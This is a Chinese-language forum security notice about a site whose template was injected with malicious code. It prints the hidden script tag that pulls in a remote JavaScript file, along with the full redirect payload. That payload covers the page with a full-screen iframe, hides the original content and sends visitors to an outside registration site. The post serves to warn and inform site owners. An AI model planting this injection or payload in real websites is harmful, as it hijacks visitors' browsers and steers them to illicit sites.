今日,一建站学习研究会员报告,自己
论坛被百度收录的首页点击进入后会隐藏跳转到一个非法网站页面,经过排查,网站
模板漏洞被挂马,
利用语句:
<div style="visibility:hidden;"><script src="//wwww.ccak47.com/fres.js" language="JavaScript"></script>
木马js分析:
if (parent["window"]["opener"]) {
parent["window"]["opener"]["location"] = 'https://www.3306.cc'; //父窗口弹窗,对部分浏览器有效
}
var num = Math.random();//Math.random():得到一个0到1之间的随机数
num = Math.ceil(num * 100);
var wz;
if(num<=35){
wz='https://www.3306.cc/MemberCenter/Member/Register/11048';//这是%35的概率
}
else if (num<=70){
wz='https://www.3306.cc/MemberCenter/Member/Register/11048';//这是%35的概率
}
else if (num<=85){
wz='https://www.3306.cc/MemberCenter/Member/Register/11048';//这是%15的概率
}
else{
wz='https://3306.cc/';//这是%15的概率
}
function hide_parent_view()
{
var i;
var c=document.body.childNodes;
for (i=0; i<c.length; i++)
{
try{
if(c[i].id != "__overflow_view")
{
if(c[i].style)
{
c[i].style.display = "none";
}
}
}
catch(e)
{}
};
}
var __old_onload = null;
function ___page_onload()
{
hide_parent_view();
setInterval(hide_parent_view, 100);
document.body.style.overflow = "hidden";
if(__old_onload != null)
{
__old_onload();
}
}
__old_onload = window.onload;
window.onload = ___page_onload;
document.writeln('<iframe id="__overflow_view" width="100%" height="100%" style="position: fixed;background: white;border: none;top: 0;left: 0;z-index: 1999999999; _position: absolute; _top: expression(eval(document.documentElement.scrollTop)); " src="' + wz + '">');
document.writeln('</iframe>');
document.writeln("<style>");
document.writeln("body{overflow:hidden !important}");
document.writeln("body > div{display:none}");
document.writeln("</style>");
window.setTimeout("window.location='"+wz+"'",3000);
document.write ('<sc'+'ript language="javascript" type="text/javascript" src="http://js.users.51.la/19210815.js"></sc'+'ript>');
请站长们一定要注意自己网站安全,请尽量下载建站学习研究网友发布资源,切勿随意给淘宝或其他非官方人员FTP、后台信息,外面挂马资源横行,骗子维护人员猖狂,很多打着免费的幌子嵌入垃圾代码、挂马代码js等层出不穷,
站长窝唯一可以给站长保证的是,
站长窝80%资源都是自己应用中心分享的原版插件分享的,其他建站学习研究网友发布的都是建站学习研究自己分享分享给
站长窝的。注重自己网站安全,规范自己安全意识十分重要,以上案列清楚显示了病毒挂马行为的运行机制,仅供有相同经历的站长分析查找自己网站漏洞的演示,切勿用于非法用途,否则后果自负。
温馨提示:
首先感谢您莅临站长窝,有任何宝贵意见欢迎反馈!
帖子如有遇到:图片不显示,附件不存在,解压密码不正确,等各种问题!请联系QQ:3535510005